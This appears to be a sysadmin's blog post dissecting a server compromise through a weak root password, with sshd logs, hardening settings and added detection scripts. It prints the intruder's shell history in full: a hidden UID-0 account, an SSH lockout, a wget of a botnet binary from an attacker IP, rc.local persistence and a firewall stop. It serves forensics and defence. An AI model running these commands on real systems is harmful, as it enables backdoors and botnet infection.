An Anatomy Of A Hack – Weak ROOT Password

So, on a peaceful Sunday night, I got an odd bandwidth warning for a development/testing server that a developer had recently created. It was pushing a fairly immense amount of traffic, peaking at 80mb a second and averaging about 8mb/s, which is definitely not normal.

[Image: bandwidth graph captured 2014-08-31 at 8.42.18 PM]

I tried to access the server via SSH but couldn’t connect at all: port 22 returned "connection reset by peer" (which indicates a block or drop), and our normal SSH port wasn’t responding at all.

I accessed the server via the Linode LISH console, but it wasn’t accepting any of our secure passwords, so I shut it down and used the Linode manager to reset the root password. That let me boot it back up and access it via LISH as root.

What I discovered next was the reason I couldn’t SSH in on either port 22 (the default) or our regular SSH port (which is not 22). These lines in root’s .bash_history show that SSH had been blocked for everyone except 2 IP addresses:

    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny

The last line would prevent any SSH access at all, apart from the two addresses listed in hosts.allow, which tcp_wrappers checks first.

So they logged in, created a user called restart (with UID 0, i.e. a second root account, and the password restart), blocked everyone but 2 IP addresses from accessing via SSH, then downloaded a piece of malware (or what I assume to be a botnet client) from the first IP address, http://121.12.168.62:6789/com

Then they ran it, made the file immutable with chattr +i, and added it to /etc/rc.local (along with a line that stops iptables) to make sure it runs on restart. Here’s the full history:

    1  w
    2  uname -a
    3  ethtool eth0
    4  ifconfiog
    5  ifconfig
    6  last
    7  useradd -g 0 -u 0 -o restart
    8  echo restart:restart |chpasswd
    9  echo "sshd:121.12.168.62"  >> /etc/hosts.allow
   10  echo "sshd:37.48.73.19"  >> /etc/hosts.allow
   11  echo "sshd:ALL"  >> /etc/hosts.deny
   12  cd /tmp/scp
   13  ls
   14  chmod 777 *
   15  ./x 5.153
   16  ls
   17  chmod 777 *
   18  ./x 5.153
   19  cd /etc
   20  wget http://121.12.168.62:6789/com
   21  chmod 0755 com
   22  ./com &
   23  chattr +i com
   24  echo "cd  /root/">>/etc/rc.local
   25  echo "./com&">>/etc/rc.local
   26  echo "/etc/init.d/iptables stop">>/etc/rc.local
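To triage a box for the traces this history leaves behind, here is an added example (not from the post) that checks constructed copies of /etc/passwd, /etc/hosts.deny and /etc/rc.local for a second UID-0 account, an sshd:ALL deny rule, and rc.local lines that background a binary or stop iptables. The account name, rule and rc.local lines are taken from the history above; everything else in the sample files is made up.

```python
import re

# Constructed file contents reproducing what the history above would leave
# behind: the "restart" account with uid 0, the hosts.deny rule, and rc.local.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
restart:x:0:0::/home/restart:/bin/sh
"""
HOSTS_DENY = "sshd:ALL\n"
RC_LOCAL = """\
#!/bin/sh -e
cd  /root/
./com&
/etc/init.d/iptables stop
exit 0
"""

def extra_uid0_accounts(passwd_text):
    """Accounts other than root with uid 0 (what `useradd -o -u 0` creates)."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found

def sshd_denied_for_all(hosts_deny_text):
    """True if a tcp_wrappers rule denies sshd (or everything) to ALL.
    Only legitimate when matching hosts.allow entries exist and are yours."""
    for line in hosts_deny_text.splitlines():
        rule = line.split("#", 1)[0].strip()
        if re.match(r"(?i)^(sshd|all)\s*:\s*all\b", rule):
            return True
    return False

# Patterns for rc.local lines that match the persistence seen in the history.
SUSPICIOUS_RC = [
    (re.compile(r"^\./\S*\s*&"), "backgrounds a relative-path binary"),
    (re.compile(r"iptables\s+stop|iptables\s+-F"), "disables the firewall"),
    (re.compile(r"^cd\s+/root"), "changes into /root"),
]

def rc_local_findings(rc_text):
    """(line, reason) for every rc.local line matching a suspicious pattern."""
    findings = []
    for line in rc_text.splitlines():
        stripped = line.strip()
        for pattern, why in SUSPICIOUS_RC:
            if pattern.search(stripped):
                findings.append((stripped, why))
    return findings
```

Run the same functions over the real files with open(...).read() on a suspect host; a non-empty result from any of them is worth a closer look.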

I uploaded the malware to VirusTotal to scan it and see what it turned up:

[VirusTotal scan results]

The only decent description I found was from Telus:

Backdoor.Linux.Ganiw.A is a Backdoor and Bot agent that targets the Linux platform. The malware contacts a remote server, identifying itself, and sending system information. In addition, it receives control commands to perform various nefarious activities on the infected system. Moreover, the malware has the capabilities to embark on different types of DoS attacks. To survive a system reboot, it adds an entry to the initialization directory “/etc/init.d”.

As for the actual entry, it seems the password was brute-forced by a different IP address (also from China), and then later the same day the server was logged into from 121.12.168.62, the IP address that appears in the history.

Aug 30 01:46:43 li737-216 sshd[20132]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:45 li737-216 sshd[20134]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:46:47 li737-216 sshd[20134]: Failed password for root from 60.172.228.102 port 4670 ssh2
Aug 30 01:46:58 li737-216 sshd[20134]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4670 ssh2]
Aug 30 01:46:58 li737-216 sshd[20134]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:00 li737-216 sshd[20136]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:01 li737-216 sshd[20136]: Failed password for root from 60.172.228.102 port 4526 ssh2
Aug 30 01:47:12 li737-216 sshd[20136]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4526 ssh2]
Aug 30 01:47:12 li737-216 sshd[20136]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:14 li737-216 sshd[20138]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:15 li737-216 sshd[20138]: Failed password for root from 60.172.228.102 port 3781 ssh2
Aug 30 01:47:25 li737-216 sshd[20138]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 3781 ssh2]
Aug 30 01:47:25 li737-216 sshd[20138]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:27 li737-216 sshd[20140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:29 li737-216 sshd[20140]: Failed password for root from 60.172.228.102 port 4405 ssh2
Aug 30 01:47:39 li737-216 sshd[20140]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4405 ssh2]
Aug 30 01:47:39 li737-216 sshd[20140]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:41 li737-216 sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:44 li737-216 sshd[20144]: Failed password for root from 60.172.228.102 port 1662 ssh2
Aug 30 01:47:54 li737-216 sshd[20144]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 1662 ssh2]
Aug 30 01:47:54 li737-216 sshd[20144]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:55 li737-216 sshd[20146]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=60.172.228.102  user=root
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from 60.172.228.102 port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2

Then the two logins:

Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from 121.12.168.62 port 3117 ssh2
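Added example, not from the post: detection logic that runs over the auth.log lines above (a subset embedded as sample input) and flags any host that gets an accepted password login after a run of failures, counting rsyslog's "message repeated N times" lines as well. The threshold of 10 failures is an assumption.

```python
import re
from collections import defaultdict

# Sample lines copied from the auth.log excerpt in the post (a subset).
SAMPLE_LOG = """\
Aug 30 01:46:47 li737-216 sshd[20134]: Failed password for root from 60.172.228.102 port 4670 ssh2
Aug 30 01:46:58 li737-216 sshd[20134]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4670 ssh2]
Aug 30 01:47:01 li737-216 sshd[20136]: Failed password for root from 60.172.228.102 port 4526 ssh2
Aug 30 01:47:12 li737-216 sshd[20136]: message repeated 5 times: [ Failed password for root from 60.172.228.102 port 4526 ssh2]
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from 60.172.228.102 port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from 60.172.228.102 port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from 121.12.168.62 port 3117 ssh2
""".splitlines()

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
# rsyslog collapses identical consecutive lines into "message repeated N times",
# so those count for N failures; they must be matched before FAILED.
REPEAT = re.compile(r"message repeated (\d+) times: \[ Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPT = re.compile(r"Accepted (\S+) for (\S+) from (\S+) port")

def summarize(lines):
    """{rhost: {"failed": count, "accepted": [(timestamp, user, method), ...]}}."""
    stats = defaultdict(lambda: {"failed": 0, "accepted": []})
    for line in lines:
        if m := REPEAT.search(line):
            stats[m.group(3)]["failed"] += int(m.group(1))
        elif m := FAILED.search(line):
            stats[m.group(2)]["failed"] += 1
        elif m := ACCEPT.search(line):
            method, user, rhost = m.groups()
            stats[rhost]["accepted"].append((line[:15], user, method))  # syslog timestamp
    return stats

def brute_force_successes(lines, threshold=10):
    """Hosts that got a password login after at least `threshold` failures."""
    return [(rhost, s["failed"]) for rhost, s in summarize(lines).items()
            if s["failed"] >= threshold
            and any(method == "password" for _, _, method in s["accepted"])]

def root_password_logins(lines):
    """Every accepted password login for root, as (timestamp, rhost), in log order."""
    return [(line[:15], m.group(3)) for line in lines
            if (m := ACCEPT.search(line))
            and m.group(1) == "password" and m.group(2) == "root"]
```

The second function is the simpler alarm: with PermitRootLogin and PasswordAuthentication both off, it should never return anything.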

As a rule I disable root login via SSH, move it to a different port (not 22), disable password-based logins, and use a limited list of users that can access SSH. This makes it pretty secure and can be done with the following sshd_config settings:

Port 888
PermitRootLogin no
PasswordAuthentication no
AllowUsers YOURALLOWEDUSER

Then restart sshd, of course. Generally choose a port below 1024, as it’s then still a privileged port and can’t be hijacked by a non-root user (one for the paranoid).
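Added example, not from the post: an audit of the four settings above against an sshd_config, honouring sshd's first-occurrence-wins rule and stopping at a Match block. The two config fragments and the user name deploy are constructed; unset keys are treated as the permissive default.

```python
import re

# Constructed sshd_config fragments: the defaults that left this box open to
# password guessing, and the four settings the post recommends ("deploy" is a
# placeholder user name).
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""
HARDENED_CONFIG = """\
Port 888
PermitRootLogin no
PasswordAuthentication no
AllowUsers deploy
"""

def parse_sshd_config(text):
    """Effective global settings. sshd uses the first occurrence of a keyword,
    keywords are case-insensitive, 'Key value' and 'Key=value' are both valid,
    and everything after a Match line is conditional, so parsing stops there."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings

def audit_sshd_config(text):
    """Findings against the post's rules; an empty list means the config passes.
    Unset keys are read as the permissive default (yes / port 22)."""
    s = parse_sshd_config(text)
    findings = []
    if s.get("permitrootlogin", "yes").lower() != "no":
        findings.append("PermitRootLogin should be no")
    if s.get("passwordauthentication", "yes").lower() != "no":
        findings.append("PasswordAuthentication should be no")
    if "allowusers" not in s:
        findings.append("AllowUsers is not set, so every account may try SSH")
    port = int(s.get("port", "22"))
    if port == 22:
        findings.append("Port is the default 22")
    elif port >= 1024:
        findings.append("Port %d is unprivileged, a non-root user could bind it" % port)
    return findings
```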

This server was only 11 days old; fortunately it had nothing important on it and didn’t have access to anything else. Just be warned: even if you’re going to disable root login later, put a secure password in from the start, as you might forget about the server for a while.

And then it’ll get owned by some Chinese hacker and turned into part of their botnet for hire.

There’s really not ever any excuse to have a weak root password.

2 Responses to An Anatomy Of A Hack – Weak ROOT Password

  1. Savoia di Lucania September 3, 2014 at 8:32 pm #

    So I have to question why a server was built without a basic security policy which includes the things you later implemented? Especially on developer boxes, which are common targets…

    • ShaolinTiger September 3, 2014 at 11:54 pm #

      Some senior devs have access to create nodes, we do have a tight security policy and a script that sets everything up.

      But he didn’t run the script (he thought he had), then he went on holiday and forgot about it.